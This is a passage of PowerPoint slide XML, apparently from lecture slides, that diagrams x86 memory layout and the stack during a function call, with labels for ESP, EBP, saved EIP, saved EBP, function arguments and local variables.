              <a:ext cx="2971800" cy="64611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main() local vars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35854" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5017197" y="4601029"/>
              <a:ext cx="8382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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35855" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5072836" y="5340633"/>
              <a:ext cx="8382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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35856" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="4918529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7" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="5553529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8" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5562600"/>
              <a:ext cx="29718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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35859" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5943600"/>
              <a:ext cx="29718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environment var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
                <a:t>s</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35845" name="Right Arrow 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="2743200"/>
            <a:ext cx="3048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Calling a function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37890" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1827213"/>
            <a:ext cx="1447800" cy="282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main(){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function(s)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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28678" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="2789238"/>
            <a:ext cx="9906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push s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3789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8580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635F8BB-F650-F64D-A506-A8A6D4B305B6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37893" name="Right Arrow 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="2895600"/>
            <a:ext cx="3048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7894" name="Group 30"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="1524000"/>
            <a:ext cx="3341688" cy="4800600"/>
            <a:chOff x="5017197" y="609600"/>
            <a:chExt cx="4355403" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37897" name="Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396036" y="1752600"/>
              <a:ext cx="2971800" cy="28484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8" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="609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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37899" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="990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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37900" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1371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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37901" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396036" y="4070633"/>
              <a:ext cx="29718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top of stack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37902" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562799" y="3842033"/>
              <a:ext cx="60171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&lt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37903" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="1828800"/>
              <a:ext cx="60171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&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37904" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5017197" y="4221824"/>
              <a:ext cx="8382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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37905" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5072836" y="5340633"/>
              <a:ext cx="8382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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37906" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802311" y="4539324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7" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="5553529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8" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5562600"/>
              <a:ext cx="29718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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37909" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5943600"/>
              <a:ext cx="29718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environment var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
                <a:t>s</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37895" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5934075" y="4826000"/>
            <a:ext cx="2281238" cy="3683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function argument</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37896" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5937250" y="5141913"/>
            <a:ext cx="2279650" cy="542925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main() local vars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Calling a function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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457200" y="1827213"/>
            <a:ext cx="1447800" cy="282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main(){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function(s)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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3459163"/>
            <a:ext cx="1447800" cy="1892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/>
              <a:t>function(s){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/>
              <a:t>  return;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/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39940" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="19050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Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="2941638"/>
            <a:ext cx="1600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push return EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39942" name="AutoShape 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="3386137" y="2713038"/>
            <a:ext cx="619125" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20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3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8580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C5FFF38-5199-6D41-A6C7-5297DDDA2427}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39944" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1524000"/>
            <a:ext cx="3265488" cy="4800600"/>
            <a:chOff x="5116512" y="609600"/>
            <a:chExt cx="4256088" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39949" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1782838"/>
              <a:ext cx="2971800" cy="239485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0" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="609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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39951" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="990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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39952" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1371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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39953" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="1828800"/>
              <a:ext cx="60171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&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39954" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="454025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function argument</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39955" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4175125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saved EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39956" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="3934562"/>
              <a:ext cx="8382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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39957" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="5326743"/>
              <a:ext cx="8382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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39958" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="4163162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9" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="5555343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0" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5562600"/>
              <a:ext cx="29718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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39961" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5943600"/>
              <a:ext cx="29718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environment var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
                <a:t>s</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39945" name="Right Arrow 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3733800"/>
            <a:ext cx="3048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6" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5934075" y="4125913"/>
            <a:ext cx="2281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top of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39947" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6829425" y="3933825"/>
            <a:ext cx="4619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&lt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39948" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5937250" y="5141913"/>
            <a:ext cx="2279650" cy="542925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main() local vars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Calling a function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41986" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1827213"/>
            <a:ext cx="1447800" cy="282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main(){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function(s)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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3459163"/>
            <a:ext cx="1447800" cy="1892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/>
              <a:t>function(s){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/>
              <a:t>  return;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/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41988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8580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AD290BB-A11C-A94D-BAF4-B4D671A9CA05}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41989" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1524000"/>
            <a:ext cx="3265488" cy="4800600"/>
            <a:chOff x="5116512" y="609600"/>
            <a:chExt cx="4256088" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41992" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1752600"/>
              <a:ext cx="29718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Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="609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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41994" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="990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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41995" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1371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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41996" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="2590800"/>
              <a:ext cx="29718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top of stack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41997" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="2362200"/>
              <a:ext cx="60171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&lt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41998" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="1828800"/>
              <a:ext cx="60171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&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41999" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="454025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function argument</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42000" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="38100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saved EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42001" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4175125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saved EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42002" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4916488"/>
              <a:ext cx="2971800" cy="64611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main() local vars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42003" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="2819400"/>
              <a:ext cx="8382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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42004" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="3581400"/>
              <a:ext cx="8382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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42005" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="30480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6" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="38100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7" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5562600"/>
              <a:ext cx="29718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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42008" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5943600"/>
              <a:ext cx="29718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environment var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
                <a:t>s</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
